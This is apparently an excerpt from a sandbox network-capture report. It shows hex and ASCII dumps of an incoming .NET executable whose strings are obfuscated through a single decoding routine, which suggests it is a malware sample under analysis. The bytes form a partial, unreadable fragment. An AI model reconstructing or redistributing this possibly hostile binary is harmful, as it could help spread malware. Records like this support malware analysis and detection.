2023-11-18 09:03:00 UTC	10541	IN	Data Raw: 28 6a 00 00 0a 39 25 01 00 00 7e 1e 00 00 04 17 58 80 1e 00 00 04 09 28 6b 00 00 0a 13 04 11 04 13 05 16 13 06 38 b7 00 00 00 73 17 01 00 06 13 07 11 07 11 05 11 06 9a 7d 8b 00 00 04 11 07 fe 06 18 01 00 06 73 62 00 00 0a 28 0d 00 00 2b 13 08 11 08 39 83 00 00 00 11 07 7b 8b 00 00 04 28 8f 00 00 0a 13 09 06 73 d1 00 00 06 13 0a 11 0a 1e 8d 29 00 00 01 25 16 20 8b 8d 69 29 28 df 00 00 06 a2 25 17 12 02 28 6c 00 00 0a a2 25 18 20 af 8d 69 29 28 df 00 00 06 a2 25 19 03 a2 25 1a 20 b6 8d 69 29 28 df 00 00 06 a2 25 1b 04 a2 25 1c 20 bc 8d 69 29 28 df 00 00 06 a2 25 1d 11 09 a2 28 74 00 00 0a 6f ce 00 00 06 11 0a 11 08 6f d0 00 00 06 11 0a 6f 63 00 00 0a 11 06 17 58 13 06 11 06 11 05 8e 69 3f 3e ff ff ff 7e 16 00 00 04 20 c2 8d 69 29 28 df 00 00 06 28 36 00 00 Data Ascii: (j9%~X(k8s}sb(+9{(s)% i)(%(l% i)(%% i)(%% i)(%(tooocXi?>~ i)((6
2023-11-18 09:03:00 UTC	10542	IN	Data Raw: 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 e9 01 00 00 02 01 00 00 eb 02 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 43 00 00 00 c1 02 00 00 04 03 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 14 00 00 00 fc 02 00 00 10 03 00 00 03 00 00 00 1c 00 00 01 13 30 08 00 ea 01 00 00 1f 00 00 11 28 56 00 00 06 0a 73 79 00 00 06 0b 20 7c 8c 69 29 28 df 00 00 06 1f 11 8d 1c 00 00 01 25 16 28 29 00 00 0a 8c 14 00 00 01 a2 25 17 07 20 7c 8a 69 29 28 df 00 00 06 7e 25 00 00 04 16 6f 7a 00 00 06 a2 25 18 07 20 8f 8a 69 29 28 df 00 00 06 7e 25 00 00 04 16 6f 7a 00 00 06 a2 25 19 07 20 94 8a 69 29 28 df 00 00 06 7e 25 00 00 04 16 6f 7a 00 00 06 a2 25 1a 07 20 a5 8a 69 29 28 df 00 00 06 7e 25 00 00 04 16 6f 7a 00 00 06 a2 25 1b 07 20 a9 8a 69 29 28 df 00 00 06 7e 25 00 00 04 16 Data Ascii: C0(Vsy \|i)(%()% \|i)(~%oz% i)(~%oz% i)(~%oz% i)(~%oz% i)(~%
2023-11-18 09:03:00 UTC	10543	IN	Data Raw: 03 1c 00 00 01 1b 30 02 00 96 00 00 00 25 00 00 11 20 bb b6 69 29 28 df 00 00 06 73 30 00 00 0a 6f 31 00 00 0a 6f 32 00 00 0a 0a 2b 55 06 6f 33 00 00 0a 20 e1 b6 69 29 28 df 00 00 06 6f 34 00 00 0a 25 2d 04 26 14 2b 05 6f 05 00 00 0a 25 2d 0b 26 20 06 b5 69 29 28 df 00 00 06 28 a7 00 00 0a 23 00 00 00 00 00 00 90 40 5b 23 00 00 00 00 00 00 90 40 5b 23 00 00 00 00 00 00 90 40 5b 0b de 23 06 6f 38 00 00 0a 2d a3 de 0a 06 2c 06 06 6f 06 00 00 0a dc de 03 26 de 00 23 00 00 00 00 00 00 00 00 2a 07 2a 00 00 01 18 00 00 02 00 1a 00 61 7b 00 0a 00 00 00 00 00 00 00 00 87 87 00 03 1c 00 00 01 1b 30 04 00 48 01 00 00 26 00 00 11 73 a8 00 00 0a 0a 73 40 00 00 0a 25 20 0d b5 69 29 28 df 00 00 06 20 26 b5 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 33 b5 69 29 28 df 00 Data Ascii: 0% i)(s0o1o2+Uo3 i)(o4%-&+o%-& i)((#@[#@[#@[#o8-,o&#**a{0H&ss@% i)( &i)(oe% 3i)(
2023-11-18 09:03:00 UTC	10545	IN	Data Raw: 00 00 00 00 13 30 06 00 43 02 00 00 29 00 00 11 12 00 73 5f 00 00 0a 7d 98 00 00 04 12 00 20 41 b4 69 29 28 df 00 00 06 14 20 bf 4b 96 d6 28 df 00 00 06 28 bc 00 00 0a 25 2d 04 26 14 2b 05 6f 05 00 00 0a 7d 99 00 00 04 06 7b 99 00 00 04 2d 0c 06 7b 98 00 00 04 6f 77 00 00 0a 2a 12 00 06 7b 99 00 00 04 17 06 7b 99 00 00 04 6f 79 00 00 0a 18 59 6f 84 00 00 0a 17 8d 36 00 00 01 25 16 1f 2c 9d 6f 3d 00 00 0a 16 9a 73 96 00 00 0a 28 bd 00 00 0a 7d 99 00 00 04 06 7b 99 00 00 04 2d 0c 06 7b 98 00 00 04 6f 77 00 00 0a 2a 12 00 06 7b 99 00 00 04 20 69 b4 69 29 28 df 00 00 06 28 69 00 00 0a 7d 99 00 00 04 06 7b 99 00 00 04 28 6a 00 00 0a 2d 0c 06 7b 98 00 00 04 6f 77 00 00 0a 2a 06 7b 99 00 00 04 28 6b 00 00 0a 0b 16 0c 38 cf 00 00 00 07 08 9a 0d 73 34 01 00 06 13 Data Ascii: 0C)s_} Ai)( K((%-&+o}{-{ow{{oyYo6%,o=s(}{-{ow{ ii)((i}{(j-{ow*{(k8s4
2023-11-18 09:03:00 UTC	10546	IN	Data Raw: 00 00 0a 2d 46 7e 26 00 00 04 1b 8d 29 00 00 01 25 16 20 0a b2 69 29 28 df 00 00 06 a2 25 17 11 04 a2 25 18 20 25 b2 69 29 28 df 00 00 06 a2 25 19 11 05 a2 25 1a 20 32 b2 69 29 28 df 00 00 06 a2 28 74 00 00 0a 6f 3e 00 00 0a 08 17 58 0c 08 07 8e 69 3f 63 ff ff ff 2a 00 00 00 13 30 05 00 46 00 00 00 00 00 00 00 7e 19 00 00 04 17 58 80 19 00 00 04 20 38 b2 69 29 28 df 00 00 06 1d 8d 1c 00 00 01 25 16 02 a2 25 17 03 a2 25 18 04 a2 25 19 05 a2 25 1a 0e 04 8c 5c 00 00 01 a2 25 1b 0e 05 a2 25 1c 0e 06 a2 28 9f 00 00 0a 2a 00 00 13 30 04 00 86 00 00 00 00 00 00 00 1f 0d 8d 29 00 00 01 25 16 20 86 b2 69 29 28 df 00 00 06 a2 25 17 02 a2 25 18 20 94 b2 69 29 28 df 00 00 06 a2 25 19 03 a2 25 1a 20 a0 b2 69 29 28 df 00 00 06 a2 25 1b 04 a2 25 1c 20 bc b2 69 29 28 df Data Ascii: -F~&)% i)(%% %i)(%% 2i)((to>Xi?c0F~X 8i)(%%%%%\%%(0)% i)(%% i)(%% i)(%% i)(
2023-11-18 09:03:00 UTC	10547	IN	Data Raw: c5 06 2d 06 7e 44 00 00 0a 2a 7e 44 00 00 0a 0c 16 0d 04 06 04 6f 79 00 00 0a 06 59 6f 84 00 00 0a 13 04 16 13 06 2b 6a 09 2d 11 11 04 11 06 6f d8 00 00 0a 1f 22 33 04 17 0d 2b 50 09 2c 4d 11 04 11 06 6f d8 00 00 0a 1f 22 33 27 11 04 11 06 17 59 6f d8 00 00 0a 1f 5c 2e 18 02 02 7b 27 00 00 04 06 11 06 17 58 25 13 06 58 58 7d 27 00 00 04 2b 2a 08 11 04 11 06 6f d8 00 00 0a 13 07 12 07 28 d9 00 00 0a 28 47 00 00 0a 0c 11 06 17 58 13 06 11 06 11 04 6f 79 00 00 0a 32 8b 08 2a 1b 30 07 00 fb 00 00 00 33 00 00 11 28 da 00 00 0a 13 04 12 04 fe 16 64 00 00 01 6f 05 00 00 0a 0a 73 db 00 00 0a 0b 12 02 16 06 28 7c 00 00 06 0d 09 2c 06 73 db 00 00 0a 2a 00 16 13 05 16 13 06 17 8d 29 00 00 01 25 16 02 a2 13 07 08 11 07 8e 69 11 07 16 14 16 14 28 7b 00 00 06 0d 09 2c Data Ascii: -~D~DoyYo+j-o"3+P,Mo"3'Yo\.{'X%XX}'+o((GXoy203(dos(\|,s)%i({,
2023-11-18 09:03:00 UTC	10548	IN	Data Raw: 11 04 59 17 6a 58 58 13 07 02 11 07 69 28 8e 00 00 06 13 08 11 08 13 09 02 11 07 69 11 08 28 8f 00 00 06 13 0a 14 13 0b 11 07 11 08 6a 59 17 6a 58 13 0c 16 13 0d 38 c2 00 00 00 12 0b 11 0d 17 58 28 27 00 00 2b 11 09 17 58 13 0f 02 11 0f 28 8e 00 00 06 13 09 11 0b 11 0d 8f 52 00 00 02 02 11 0f 11 09 28 8f 00 00 06 7d bb 00 00 04 11 0b 11 0d 8f 52 00 00 02 11 0b 11 0d 8f 52 00 00 02 7b bb 00 00 04 1f 09 6a 31 43 11 0b 11 0d 8f 52 00 00 02 7b bb 00 00 04 28 90 00 00 06 2c 17 11 0b 11 0d 8f 52 00 00 02 7b bb 00 00 04 1f 0d 6a 59 18 6a 5b 2b 2e 11 0b 11 0d 8f 52 00 00 02 7b bb 00 00 04 1f 0c 6a 59 18 6a 5b 2b 17 02 7b 2a 00 00 04 11 0b 11 0d 8f 52 00 00 02 7b bb 00 00 04 d4 91 6e 7d ba 00 00 04 11 0c 11 09 11 0f 59 6a 58 17 6a 58 13 0c 11 0d 17 58 13 0d 11 0c Data Ascii: YjXXi(i(jYjX8X('+X(R(}RR{j1CR{(,R{jYj[+.R{jYj[+{*R{n}YjXjXX
2023-11-18 09:03:00 UTC	10550	IN	Data Raw: 8d 5c 00 00 01 13 0e 16 13 0f 2b 6a 11 0c 17 58 13 10 02 11 10 28 8e 00 00 06 13 0c 11 0e 11 0f 02 11 10 11 0c 28 8f 00 00 06 9f 11 0e 11 0f 11 0e 11 0f 96 1f 09 6a 31 28 11 0e 11 0f 96 28 90 00 00 06 2c 0e 11 0e 11 0f 96 1f 0d 6a 59 18 6a 5b 2b 1c 11 0e 11 0f 96 1f 0c 6a 59 18 6a 5b 2b 0e 02 7b 2a 00 00 04 11 0e 11 0f 96 d4 91 6e 9f 11 0f 17 58 13 0f 11 0f 1a 31 91 02 7b 2b 00 00 04 17 6a 2e 0d 02 7b 2b 00 00 04 18 6a 40 d2 00 00 00 02 7b 2b 00 00 04 13 11 11 11 17 6a 59 25 18 6a 36 06 26 38 ba 00 00 00 6d 45 03 00 00 00 05 00 00 00 3c 00 00 00 73 00 00 00 38 a3 00 00 00 02 7b 2f 00 00 04 08 11 06 69 58 8f 54 00 00 02 28 f1 00 00 0a 02 7b 2c 00 00 04 11 0a 11 0d 58 11 0e 16 96 58 69 11 0e 17 96 69 6f cd 00 00 0a 7d bd 00 00 04 2b 6c 02 7b 2f 00 00 04 08 Data Ascii: \+jX((j1((,jYj[+jYj[+{*nX1{+j.{+j@{+jY%j6&8mE<s8{/iXT({,XXiio}+l{/
2023-11-18 09:03:00 UTC	10551	IN	Data Raw: f8 00 00 0a 13 07 dd b4 00 00 00 17 0c 17 0d 1d 13 04 16 13 05 08 2c 15 06 16 02 7b 2c 00 00 04 04 17 59 91 9c 04 17 59 10 02 17 13 05 04 17 59 13 06 2b 74 11 06 17 59 03 32 44 06 11 05 02 7b 2c 00 00 04 11 06 91 09 17 59 1f 1f 5f 63 20 ff 00 00 00 09 1f 1f 5f 63 5f 02 7b 2c 00 00 04 11 06 17 59 91 11 04 1f 1f 5f 62 60 d2 9c 09 17 58 0d 11 05 17 58 13 05 11 04 17 59 13 04 2b 23 08 2d 20 06 11 05 02 7b 2c 00 00 04 11 06 91 09 17 59 1f 1f 5f 63 20 ff 00 00 00 09 1f 1f 5f 63 5f d2 9c 11 06 15 58 13 06 11 06 03 2f 87 06 16 28 f8 00 00 0a 13 07 de 07 26 16 6a 13 07 de 00 11 07 2a 00 00 01 0c 00 00 00 00 00 00 fc fc 00 07 1c 00 00 01 13 30 03 00 5c 00 00 00 3e 00 00 11 20 b5 01 00 00 28 f9 00 00 0a 80 3c 00 00 04 20 00 01 00 00 8d 67 00 00 01 80 3b 00 00 04 16 Data Ascii: ,{,YYY+tY2D{,Y_c _c_{,Y_b`XXY+#- {,Y_c _c_X/(&j*0\> (< g;
2023-11-18 09:03:00 UTC	10552	IN	Data Raw: 6f fe 00 00 0a 02 7b 34 00 00 04 16 28 04 01 00 0a 16 18 6f fe 00 00 0a 02 7b 34 00 00 04 16 28 04 01 00 0a 16 18 6f fe 00 00 0a 02 7b 34 00 00 04 20 00 81 00 00 28 04 01 00 0a 16 18 6f fe 00 00 0a 02 7b 34 00 00 04 03 7b c8 00 00 04 28 98 00 00 06 28 05 01 00 0a 16 1a 6f fe 00 00 0a 02 7b 34 00 00 04 06 16 06 8e 69 6f fe 00 00 0a 02 7b 34 00 00 04 08 16 08 8e 69 6f fe 00 00 0a 02 7b 34 00 00 04 07 16 07 8e 69 6f fe 00 00 0a 2a 00 00 00 13 30 04 00 d6 01 00 00 43 00 00 11 02 7b 34 00 00 04 6f 06 01 00 0a 0a 02 7b 34 00 00 04 06 6f 07 01 00 0a 02 7b 34 00 00 04 1a 8d 45 00 00 01 25 d0 5e 00 00 04 28 ea 00 00 0a 16 1a 6f fe 00 00 0a 02 7b 34 00 00 04 1f 2c 6a 28 08 01 00 0a 16 1e 6f fe 00 00 0a 02 7b 34 00 00 04 1f 2d 28 04 01 00 0a 16 18 6f fe 00 00 0a 02 Data Ascii: o{4(o{4(o{4 (o{4{((o{4io{4io{4io*0C{4o{4o{4E%^(o{4,j(o{4-(o
2023-11-18 09:03:00 UTC	10554	IN	Data Raw: 34 00 00 04 03 7b c4 00 00 04 28 04 01 00 0a 16 18 6f fe 00 00 0a 02 7b 34 00 00 04 03 7b c8 00 00 04 1f 0e 6a 58 6f 07 01 00 0a 02 7b 34 00 00 04 03 7b c9 00 00 04 28 05 01 00 0a 16 1a 6f fe 00 00 0a 02 7b 34 00 00 04 03 7b c7 00 00 04 28 98 00 00 06 28 05 01 00 0a 16 1a 6f fe 00 00 0a 02 7b 34 00 00 04 03 7b c6 00 00 04 28 98 00 00 06 28 05 01 00 0a 16 1a 6f fe 00 00 0a 02 7b 34 00 00 04 06 6f 07 01 00 0a 2a 13 30 05 00 37 00 00 00 46 00 00 11 03 1f 5c 1f 2f 6f 16 01 00 0a 10 01 03 1f 3a 6f f7 00 00 0a 0a 06 16 32 0c 03 16 06 17 58 6f 17 01 00 0a 10 01 03 17 8d 36 00 00 01 25 16 1f 2f 9d 6f 18 01 00 0a 2a 00 13 30 04 00 ac 00 00 00 47 00 00 11 28 25 00 00 0a 02 16 18 6f cd 00 00 0a 20 03 b0 69 29 28 df 00 00 06 28 3c 00 00 0a 2c 24 02 28 aa 00 00 06 13 Data Ascii: 4{(o{4{jXo{4{(o{4{((o{4{((o{4o07F\/o:o2Xo6%/o0G(%o i)((<,$(
2023-11-18 09:03:00 UTC	10555	IN	Data Raw: 12 02 02 8e 69 28 1d 01 00 0a 7d d6 00 00 04 12 02 02 8e 69 7d d5 00 00 04 02 16 08 7b d6 00 00 04 02 8e 69 28 24 01 00 0a de 03 26 de 00 20 d8 bf 69 29 28 df 00 00 06 20 f5 bf 69 29 28 df 00 00 06 28 32 00 00 2b 12 02 12 04 12 01 7e ad 00 00 0a 12 03 17 12 00 6f 6b 01 00 06 26 06 7b d5 00 00 04 8d 45 00 00 01 13 06 06 7b d6 00 00 04 11 06 16 06 7b d5 00 00 04 28 25 01 00 0a 11 06 13 07 de 62 26 de 58 06 7b d6 00 00 04 7e ad 00 00 0a 28 26 01 00 0a 2c 0b 06 7b d6 00 00 04 28 1b 01 00 0a 08 7b d6 00 00 04 7e ad 00 00 0a 28 26 01 00 0a 2c 0b 08 7b d6 00 00 04 28 1b 01 00 0a 07 7b d6 00 00 04 7e ad 00 00 0a 28 26 01 00 0a 2c 0b 07 7b d6 00 00 04 28 1b 01 00 0a dc 16 8d 45 00 00 01 2a 11 07 2a 01 24 00 00 00 00 50 00 36 86 00 03 1c 00 00 01 00 00 50 00 8f df Data Ascii: i(}i}{i($& i)( i)((2+~ok&{E{{(%b&X{~(&,{({~(&,{({~(&,{(E**$P6P
2023-11-18 09:03:00 UTC	10556	IN	Data Raw: 07 11 07 8e 69 02 28 b3 00 00 06 8e 69 58 8d 45 00 00 01 13 0d 11 07 16 11 0d 16 11 07 8e 69 28 88 00 00 0a 02 28 b3 00 00 06 16 11 0d 11 07 8e 69 02 28 b3 00 00 06 8e 69 28 88 00 00 0a 11 0c 11 0d 6f ab 00 00 0a 13 08 de 0c 11 0c 2c 07 11 0c 6f 06 00 00 0a dc 11 06 8e 69 11 08 8e 69 58 8d 45 00 00 01 13 09 11 06 16 11 09 16 11 06 8e 69 28 88 00 00 0a 11 08 16 11 09 11 06 8e 69 11 08 8e 69 28 88 00 00 0a 02 1f 18 8d 45 00 00 01 28 b5 00 00 06 16 13 0e 2b 14 02 28 b4 00 00 06 11 0e 11 09 11 0e 91 9c 11 0e 17 58 13 0e 11 0e 02 28 b4 00 00 06 8e 69 32 e0 02 1e 8d 45 00 00 01 28 b7 00 00 06 02 28 b6 00 00 06 8e 69 17 59 13 0a 11 09 8e 69 17 59 13 0f 2b 1a 02 28 b6 00 00 06 11 0a 11 09 11 0f 91 9c 11 0a 17 59 13 0a 11 0f 17 59 13 0f 11 0f 11 09 8e 69 02 28 b6 Data Ascii: i(iXEi((i(i(o,oiiXEi(ii(E(+(X(i2E((iYiY+(YYi(
2023-11-18 09:03:00 UTC	10558	IN	Data Raw: 00 06 16 06 02 28 bf 00 00 06 8e 69 02 28 c0 00 00 06 8e 69 28 21 01 00 0a 73 2d 01 00 0a 06 28 ab 00 00 0a 0b 18 8d 45 00 00 01 25 16 1a 9c 25 17 1f 0e 9c 13 04 11 04 8e 69 02 28 c2 00 00 06 8e 69 58 8d 45 00 00 01 0c 11 04 16 08 16 11 04 8e 69 28 21 01 00 0a 02 28 c2 00 00 06 16 08 11 04 8e 69 02 28 c2 00 00 06 8e 69 28 21 01 00 0a 73 39 01 00 0a 07 02 28 c1 00 00 06 17 73 c8 00 00 06 1f 20 6f c9 00 00 06 0d 73 3a 01 00 0a 25 17 6f 31 01 00 0a 25 20 80 00 00 00 6f 3b 01 00 0a 25 20 00 01 00 00 6f 3c 01 00 0a 25 19 6f 32 01 00 0a 09 08 6f 35 01 00 0a 02 28 be 00 00 06 16 02 28 be 00 00 06 8e 69 6f 3d 01 00 0a 2a 13 30 03 00 ae 00 00 00 00 00 00 00 02 17 7d 49 00 00 04 02 28 0f 00 00 0a 02 03 25 2d 1b 26 20 0b be 69 29 28 df 00 00 06 20 1a be 69 29 28 df Data Ascii: (i(i(!s-(E%%i(iXEi(!(i(i(!s9(s os:%o1% o;% o<%o2o5((io=*0}I(%-& i)( i)(
2023-11-18 09:03:00 UTC	10559	IN	Data Raw: 00 00 02 00 6f 01 1f 8e 01 0e 00 00 00 00 1b 30 06 00 42 02 00 00 57 00 00 11 02 28 0f 00 00 0a 73 49 01 00 0a 0a 02 73 4a 01 00 0a 7d 5a 00 00 04 03 73 5b 00 00 0a 13 04 11 04 73 4b 01 00 0a 13 05 16 13 06 11 05 6f 4c 01 00 0a 6f 06 01 00 0a 69 13 07 2b 13 06 11 05 6f 4d 01 00 0a 6f 4e 01 00 0a 11 06 17 58 13 06 11 06 11 07 32 e7 de 18 11 05 2c 07 11 05 6f 06 00 00 0a dc 11 04 2c 07 11 04 6f 06 00 00 0a dc 06 6f 4f 01 00 0a 16 1a 16 28 dd 00 00 06 28 50 01 00 0a 20 3f bd 69 29 28 df 00 00 06 20 c1 42 96 d6 28 df 00 00 06 6f 3f 00 00 0a 06 6f 4f 01 00 0a 1f 0c 1a 17 28 dd 00 00 06 16 28 1c 01 00 0a 0b 20 46 bd 69 29 28 df 00 00 06 6f 51 01 00 0a 2d 01 2a 06 6f 4f 01 00 0a 1f 38 1a 16 28 dd 00 00 06 28 50 01 00 0a 20 56 bd 69 29 28 df 00 00 06 20 aa 42 96 Data Ascii: o0BW(sIsJ}Zs[sKoLoi+oMoNX2,o,ooO((P ?i)( B(o?oO(( Fi)(oQ-*oO8((P Vi)( B
2023-11-18 09:03:00 UTC	10560	IN	Data Raw: fe 33 1d 02 7b 72 00 00 04 28 6e 01 00 0a 6f 6f 01 00 0a 33 0b 02 16 7d 70 00 00 04 02 0a 2b 07 16 73 f2 00 00 06 0a 06 2a 13 30 07 00 b8 00 00 00 5d 00 00 11 28 25 00 00 0a 03 1a 6f 73 01 00 0a 74 1c 00 00 1b 6f 55 00 00 0a 03 1f 0a 6f 73 01 00 0a a5 6b 00 00 01 17 6a fe 01 13 06 12 06 28 74 01 00 0a 6f 75 01 00 0a 0a 28 25 00 00 0a 03 1b 6f 73 01 00 0a 74 1c 00 00 1b 6f 55 00 00 0a 0b 03 1f 09 6f 73 01 00 0a a5 6b 00 00 01 17 6a fe 01 13 06 12 06 28 74 01 00 0a 6f 75 01 00 0a 0c 03 1c 6f 73 01 00 0a a5 6b 00 00 01 0d 28 25 00 00 0a 03 18 6f 73 01 00 0a 74 1c 00 00 1b 6f 55 00 00 0a 13 04 28 25 00 00 0a 03 19 6f 73 01 00 0a 74 1c 00 00 1b 6f 55 00 00 0a 13 05 06 07 08 09 11 04 11 05 28 6b 00 00 06 2a 13 30 04 00 34 00 00 00 13 00 00 11 28 25 00 00 0a 03 Data Ascii: 3{r(noo3}p+s0](%ostoUoskj(tou(%ostoUoskj(touosk(%ostoU(%ostoU(k04(%
2023-11-18 09:03:00 UTC	10562	IN	Data Raw: 00 00 04 2a 13 30 02 00 75 00 00 00 00 00 00 00 02 7b de 00 00 04 7e ad 00 00 0a 28 26 01 00 0a 2c 0b 02 7b de 00 00 04 28 1b 01 00 0a 02 7b e2 00 00 04 7e ad 00 00 0a 28 26 01 00 0a 2c 0b 02 7b e2 00 00 04 28 1b 01 00 0a 02 7b e0 00 00 04 7e ad 00 00 0a 28 26 01 00 0a 2c 0b 02 7b e0 00 00 04 28 1b 01 00 0a 02 7b e4 00 00 04 7e ad 00 00 0a 28 26 01 00 0a 2c 0b 02 7b e4 00 00 04 28 1b 01 00 0a 2a 00 00 00 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33 30 33 31 39 00 00 00 00 04 00 60 00 00 00 ce 51 00 00 23 7e 00 00 2e 52 00 00 4c 0f 01 00 23 53 74 72 69 6e 67 73 00 00 00 00 7a 61 01 00 10 00 00 00 23 47 55 49 44 00 00 00 8a 61 01 00 30 17 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 01 01 57 bf a2 3f 09 1e 00 00 00 fa 01 33 00 16 00 Data Ascii: 0u{~(&,{({~(&,{({~(&,{({~(&,{(BSJBv4.0.30319`Q#~.RL#Stringsza#GUIDa0#BlobW?3
2023-11-18 09:03:00 UTC	10563	IN	Data Raw: 05 00 00 5e 0d 00 00 06 00 85 0f 00 00 5e 0d 00 00 1a 00 0b 15 00 00 f3 15 00 00 06 00 cf 01 00 00 5e 0d 00 00 06 00 25 18 00 00 75 0e 00 00 06 00 28 14 00 00 7d 12 00 00 06 00 8d 06 00 00 5e 0d 00 00 06 00 94 02 00 00 5e 0d 00 00 06 00 a6 0f 00 00 5e 0d 00 00 06 00 28 11 00 00 5e 0d 00 00 06 00 4f 0f 00 00 5e 0d 00 00 12 00 10 0d 00 00 1a 0e 00 00 12 00 e9 05 00 00 1a 0e 00 00 06 00 be 10 00 00 5e 0d 00 00 06 00 2d 0a 00 00 5e 0d 00 00 06 00 59 10 00 00 05 18 00 00 06 00 e3 00 00 00 05 18 00 00 06 00 03 05 00 00 05 18 00 00 06 00 73 10 00 00 05 18 00 00 06 00 65 0d 00 00 05 18 00 00 06 00 f9 05 00 00 05 18 00 00 06 00 cc 05 00 00 05 18 00 00 06 00 a3 0d 00 00 05 18 00 00 06 00 1e 0d 00 00 05 18 00 00 06 00 d8 05 00 00 05 18 00 00 06 00 34 10 00 00 5e 04 Data Ascii: ^^^%u(}^^^(^O^^-^Yse4^
2023-11-18 09:03:00 UTC	10564	IN	Data Raw: 00 00 71 00 62 00 df 00 03 21 10 00 cb 6a 00 00 00 00 00 00 71 00 63 00 e0 00 03 01 10 00 f4 74 00 00 00 00 00 00 71 00 65 00 e3 00 03 01 10 00 a6 04 01 00 00 00 00 00 71 00 66 00 e5 00 03 21 10 00 3a 02 01 00 00 00 00 00 71 00 67 00 e7 00 03 01 10 00 0e 90 00 00 00 00 00 00 71 00 6e 00 ef 00 03 01 10 00 ae e4 00 00 00 00 00 00 71 00 70 00 f2 00 03 01 10 00 ae 03 01 00 00 00 00 00 71 00 73 00 fa 00 03 01 10 00 86 08 01 00 00 00 00 00 71 00 74 00 fc 00 03 21 10 00 66 0c 01 00 00 00 00 00 71 00 75 00 fe 00 03 01 10 00 a0 9c 00 00 00 00 00 00 71 00 7f 00 09 01 03 01 10 00 84 82 00 00 00 00 00 00 71 00 80 00 0b 01 03 21 10 00 54 3f 00 00 00 00 00 00 71 00 81 00 0d 01 03 01 10 00 fa 2b 00 00 00 00 00 00 71 00 84 00 11 01 03 01 10 00 82 f9 00 00 00 00 00 00 71 Data Ascii: qb!jqctqeqf!:qgqnqpqsqt!fquqq!T?q+qq
2023-11-18 09:03:00 UTC	10566	IN	Data Raw: 77 00 00 15 00 01 00 e0 c1 00 00 1c 00 51 80 f4 a1 00 00 1c 00 51 80 8a f8 00 00 1c 00 21 00 c0 4f 00 00 2c 00 21 00 42 01 01 00 30 00 21 00 76 eb 00 00 2c 00 21 00 b4 25 00 00 30 00 01 00 e4 76 00 00 33 00 01 00 f8 be 00 00 37 00 01 00 75 58 00 00 3d 00 51 80 8e 29 00 00 23 00 51 80 9e e6 00 00 23 00 21 00 68 de 00 00 43 00 01 00 c9 a6 00 00 4c 00 01 00 c2 f1 00 00 09 00 21 00 e5 85 00 00 2c 00 21 00 83 65 00 00 50 00 01 00 e8 3c 00 00 53 00 01 00 cf 0e 01 00 23 00 01 00 f8 83 00 00 23 00 31 00 d6 fe 00 00 57 00 31 00 2e 43 00 00 5b 00 21 00 e9 59 00 00 2c 00 21 00 7b 1d 00 00 2c 00 21 00 02 2b 00 00 2c 00 21 00 dd 86 00 00 2c 00 01 00 fa af 00 00 2c 00 01 00 c2 89 00 00 2c 00 21 00 b5 42 00 00 2c 00 21 00 57 d1 00 00 2c 00 21 00 d9 5b 00 00 2c 00 21 00 Data Ascii: wQQ!O,!B0!v,!%0v37uX=Q)#Q#!hCL!,!eP<S##1W1.C[!Y,!{,!+,!,,,!B,!W,![,!
2023-11-18 09:03:00 UTC	10567	IN	Data Raw: 00 00 1c 00 06 00 14 55 00 00 1c 00 06 00 f2 eb 00 00 0c 02 06 00 96 06 01 00 09 00 06 00 84 bd 00 00 1c 00 06 00 2d 61 00 00 0c 02 06 06 80 04 00 00 1c 00 56 80 ae 05 00 00 6b 00 56 80 c5 10 00 00 6b 00 56 80 cf 0b 00 00 6b 00 56 80 e6 10 00 00 6b 00 06 00 4f d2 00 00 1c 00 06 00 46 c4 00 00 1c 00 21 00 5f d0 00 00 0c 02 21 00 98 54 00 00 1c 00 21 00 ea ec 00 00 0c 02 21 00 2b b9 00 00 1c 00 21 00 97 c9 00 00 0c 02 21 00 9b d8 00 00 1c 00 21 00 66 2e 00 00 0c 02 21 00 fe f9 00 00 1c 00 06 00 f2 0a 01 00 1c 00 06 00 d1 e0 00 00 50 00 06 00 f0 3b 00 00 1c 00 f1 4c 00 00 00 00 91 18 03 12 00 00 0f 02 01 00 f3 4c 00 00 00 00 86 08 44 4f 00 00 13 02 01 00 fb 4c 00 00 00 00 86 08 d1 5c 00 00 18 02 01 00 03 4d 00 00 00 00 86 18 fd 11 00 00 1d 02 01 00 04 57 00 Data Ascii: U-aVkVkVkVkOF!_!T!!+!!!f.!P;LLDOL\MW
2023-11-18 09:03:00 UTC	10568	IN	Data Raw: 02 29 00 fc 4e 00 00 00 00 c6 08 28 7e 00 00 78 02 29 00 64 84 00 00 00 00 c4 00 48 7a 00 00 7e 02 29 00 ff 4e 00 00 00 00 86 18 fd 11 00 00 42 02 29 00 07 4f 00 00 00 00 c6 08 28 7e 00 00 78 02 29 00 f0 87 00 00 00 00 c4 00 cd 88 00 00 7e 02 29 00 e8 89 00 00 00 00 96 00 5a fe 00 00 60 02 29 00 0a 4f 00 00 00 00 91 00 8b 64 00 00 60 02 29 00 44 8a 00 00 00 00 91 00 c8 40 00 00 d6 02 29 00 f0 8a 00 00 00 00 91 00 c1 5e 00 00 60 02 29 00 a8 8b 00 00 00 00 96 00 83 db 00 00 d6 02 29 00 60 8c 00 00 00 00 91 00 a0 53 00 00 60 02 29 00 fc 8c 00 00 00 00 91 00 2b c7 00 00 de 02 29 00 bc 8d 00 00 00 00 96 00 ca f0 00 00 60 02 29 00 4a 4f 00 00 00 00 86 18 fd 11 00 00 42 02 29 00 52 4f 00 00 00 00 91 18 03 12 00 00 0f 02 29 00 5e 4f 00 00 00 00 c6 08 28 7e 00 00 Data Ascii: )N(~x)dHz~)NB)O(~x)~)Z`)Od`)D@)^`))`S`)+)`)JOB)RO)^O(~
